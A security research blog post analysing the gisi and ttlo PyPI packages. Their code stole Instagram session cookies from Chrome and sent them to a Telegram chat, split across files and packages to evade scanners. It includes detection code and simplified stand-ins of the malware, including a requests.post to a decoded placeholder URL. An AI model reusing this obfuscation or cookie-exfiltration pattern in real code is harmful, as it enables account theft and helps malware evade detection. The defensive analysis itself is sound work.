
Divide and Hide: How Malicious Code Lived on PyPI for 3 Months

The Station 9 research team discovered malicious code that was divided and distributed across different packages, remaining on PyPI for months while being downloaded nearly 2,000 times.


Written by Henrik Plate
Published on July 21, 2023
Topics: Security


Many malicious packages published on OSS package repositories contain the same or very similar malicious code: often a simple block of a few lines in files like setup.py. Luckily, the detection and removal of such clones has steadily improved, so most malicious packages now accumulate relatively few downloads.

This blog post presents an interesting malware variant, where the malicious code is spread across different functions, files and even packages. The malicious behavior itself is very simplistic, but the obfuscation technique used demonstrates how adversaries evolve in order to hinder malware detection.

—

Many researchers and companies have started hunting for malicious packages published on open source repositories like PyPI or npm, and it is not uncommon that packages flagged by our pipeline have already been removed by the time we review the findings.

Many of those packages, however, contain the same single block of malicious code in files like setup.py, __init__.py (for Python packages) or index.js (for npm). This makes it possible to devise relatively simple detection patterns, e.g. patterns over abstract syntax trees or even regular expressions, that can be run efficiently and at scale on thousands of packages every day.
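As a rough illustration of such single-file patterns, the Python sketch below flags a `requests.post` call whose first argument is decoded inline from Base64, once with a regular expression and once on the abstract syntax tree. The pattern, the helper names `regex_hits`, `ast_hits` and `_dotted_name`, and the sample input are hypothetical; they are not the detection rules of our pipeline.

```python
import ast
import re

# Hypothetical rule: a network call whose first argument is Base64-decoded inline,
# e.g. requests.post(base64.b64decode("...")).
INLINE_B64_POST = re.compile(r"requests\.post\(\s*base64\.b64decode\(")


def regex_hits(source: str) -> bool:
    """Cheap text-level check on a single file."""
    return bool(INLINE_B64_POST.search(source))


def _dotted_name(node: ast.AST) -> str:
    """Return 'a.b.c' for Name/Attribute chains, '' for anything else."""
    if isinstance(node, ast.Name):
        return node.id
    if isinstance(node, ast.Attribute):
        base = _dotted_name(node.value)
        return f"{base}.{node.attr}" if base else ""
    return ""


def ast_hits(source: str) -> bool:
    """Same rule on the AST of a single file, robust to whitespace and line breaks."""
    for node in ast.walk(ast.parse(source)):
        if isinstance(node, ast.Call) and _dotted_name(node.func) == "requests.post":
            first = node.args[0] if node.args else None
            if isinstance(first, ast.Call) and _dotted_name(first.func) == "base64.b64decode":
                return True
    return False


# Placeholder Base64 string for a harmless URL, not the attacker's value.
sample = 'import base64, requests\nrequests.post(base64.b64decode("aHR0cHM6Ly9leGFtcGxlLmludmFsaWQ="), data={})\n'
print(regex_hits(sample), ast_hits(sample))  # True True
```

Both checks look at one file at a time, which is what keeps them cheap enough to run on every new upload.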

This blog post presents a variant where the malicious code has been divided into smaller chunks that were then distributed across several files and even different packages, very likely with the intention to hinder malware detection.

Perhaps for that reason, the two packages involved, gisi and ttlo, achieved somewhat longer dwell times and higher download counts than packages of other malware campaigns: Both were uploaded to PyPI on April 16th and taken down on July 7th following our notification of the PyPI administrators (who reacted blazingly fast: the packages were yanked just 2 minutes after we sent the email). According to PyPI Stats, gisi and ttlo were downloaded 1,291 and 667 times, respectively, during that time frame.
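The dwell time and the combined download count can be checked with a few lines of Python. The year 2023 is an assumption based on the publication date of this post; the download counts are the PyPI Stats figures quoted above.

```python
from datetime import date

# Upload and takedown dates from the text (year 2023 assumed).
uploaded = date(2023, 4, 16)
taken_down = date(2023, 7, 7)

# Download counts reported by PyPI Stats for the two packages.
downloads = {"gisi": 1291, "ttlo": 667}

dwell_days = (taken_down - uploaded).days
total = sum(downloads.values())
print(dwell_days, total)  # 82 1958
```

That works out to 82 days, a little under three months, and 1,958 downloads in total.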

ttlo and gisi

The functionality of this malware is relatively simple and aims at hijacking Instagram accounts: It uses an SQL SELECT query to search the SQLite database in which Chrome stores cookies on Windows for Instagram session identifiers. When it finds one, it updates the cookie's expiry date and exfiltrates its value via a POST request to a Telegram chat.

More interesting is how the attacker split the individual pieces, in particular across the functions ttlo(), b() and gisi(), each located in a Python file of the same name.

The cookie search and update is part of the Python package gisi (which likely stands for “get instagram session identifier”), while the exfiltration logic was distributed with the package ttlo. However, neither package declares a dependency on the other, so it is unclear how the attacker ensured that both were present in the victim’s environment.

Moreover, the malicious code was split across several functions in several distinct files. The decryption of encrypted cookie values, for example, is implemented in the function dd(), located in a Python file of the same name.

Both packages also contain a dedicated function for decoding Base64-encoded strings, which was probably meant to evade simple detection patterns as well. Instead of directly calling requests.post(base64.b64decode('aHR[...]Z2U=') [...], the attacker added another level of indirection by defining a string variable a and a decoder function b() in a dedicated file. Both gisi and ttlo use this technique, which turns the call into requests.post(b(a) [...].
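To see why this indirection helps the attacker, consider a hypothetical per-file rule that flags a file only if it both posts data with `requests` and calls `base64.b64decode`. The file contents are simplified stand-ins modeled on the description above (the Base64 string is a placeholder for a harmless URL, not the attacker's value), and the rule and helper names are assumptions for illustration.

```python
import ast

# Hypothetical, simplified stand-ins for two files of one package.
FILES = {
    "b.py": (
        "import base64\n"
        "a = 'aHR0cHM6Ly9leGFtcGxlLmludmFsaWQ='  # placeholder URL\n"
        "def b(s):\n"
        "    return base64.b64decode(s).decode()\n"
    ),
    "ttlo.py": (
        "import requests\n"
        "from .b import a, b\n"
        "def ttlo(value):\n"
        "    requests.post(b(a), data={'v': value})\n"
    ),
}

# The same behavior written as a single, non-split line.
DIRECT = (
    "import base64, requests\n"
    "requests.post(base64.b64decode('aHR0cHM6Ly9leGFtcGxlLmludmFsaWQ='), data={})\n"
)


def called_names(source: str) -> set[str]:
    """Source text of every called expression in one file, e.g. 'requests.post'."""
    return {
        ast.unparse(node.func)
        for node in ast.walk(ast.parse(source))
        if isinstance(node, ast.Call)
    }


def per_file_suspicious(source: str) -> bool:
    """Hypothetical rule: the same file both decodes Base64 and posts data."""
    names = called_names(source)
    return "requests.post" in names and "base64.b64decode" in names


print(per_file_suspicious(DIRECT))  # True
print({path: per_file_suspicious(src) for path, src in FILES.items()})
# {'b.py': False, 'ttlo.py': False}
```

The one-liner is still caught, but once the decoder moves into its own file, neither file matches on its own.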

So what?

Splitting the malicious functionality makes life considerably harder for malware scanners. It is no longer sufficient to scan individual files with simple patterns. Understanding the program behavior requires gathering all the packages and analyzing all their files together in order to find suspicious data or control flows.
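A toy version of such a joint analysis can be sketched in two passes over the files of all packages at once: first collect every function that wraps `base64.b64decode`, then flag `requests.post` calls whose arguments pass through one of those wrappers. This is a minimal sketch under strong simplifying assumptions: functions are matched by bare name without resolving imports, and the file contents and helper names are hypothetical stand-ins, not the actual package sources or our tooling. Real tools would resolve imports and track data flows properly.

```python
import ast

# Hypothetical, simplified files from both packages, keyed by package path.
# The Base64 string is a placeholder, not the attacker's actual value.
FILES = {
    "gisi/b.py": "import base64\ndef b(s):\n    return base64.b64decode(s).decode()\n",
    "ttlo/b.py": (
        "import base64\n"
        "a = 'aHR0cHM6Ly9leGFtcGxlLmludmFsaWQ='\n"
        "def b(s):\n"
        "    return base64.b64decode(s).decode()\n"
    ),
    "ttlo/ttlo.py": (
        "import requests\n"
        "from .b import a, b\n"
        "def ttlo(value):\n"
        "    requests.post(b(a), data={'v': value})\n"
    ),
}


def _callee(call: ast.Call) -> str:
    """Source text of the called expression, e.g. 'requests.post' or 'b'."""
    return ast.unparse(call.func)


def find_decoders(files: dict[str, str]) -> set[str]:
    """Pass 1: names of functions, in any file, whose body calls base64.b64decode."""
    decoders = set()
    for source in files.values():
        for node in ast.walk(ast.parse(source)):
            if isinstance(node, ast.FunctionDef) and any(
                isinstance(inner, ast.Call) and _callee(inner) == "base64.b64decode"
                for inner in ast.walk(node)
            ):
                decoders.add(node.name)
    return decoders


def find_suspicious_posts(files: dict[str, str]) -> list[str]:
    """Pass 2: requests.post calls with an argument produced by a decoder."""
    decoders = find_decoders(files) | {"base64.b64decode"}
    hits = []
    for path, source in files.items():
        for node in ast.walk(ast.parse(source)):
            if not (isinstance(node, ast.Call) and _callee(node) == "requests.post"):
                continue
            # Every call nested anywhere in the positional or keyword arguments.
            nested = [
                inner
                for arg in [*node.args, *(kw.value for kw in node.keywords)]
                for inner in ast.walk(arg)
                if isinstance(inner, ast.Call)
            ]
            if any(_callee(inner) in decoders for inner in nested):
                hits.append(f"{path}:{node.lineno}")
    return hits


print(find_decoders(FILES))          # {'b'}
print(find_suspicious_posts(FILES))  # ['ttlo/ttlo.py:4']
```

Because pass 1 indexes every file before pass 2 inspects any call site, the wrapper in one file is recognized at the call site in another; the price is that all files of all involved packages must be parsed together.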

Such whole-program analysis, however, is more resource-hungry than a simple pattern search, which makes it difficult to scale a corresponding solution to the thousands of packages published every day on PyPI, npm and other package repositories. Of course, such malware improvements do not come as a surprise: They are part of the typical arms race between attackers and defenders that takes place in every single IT security domain.
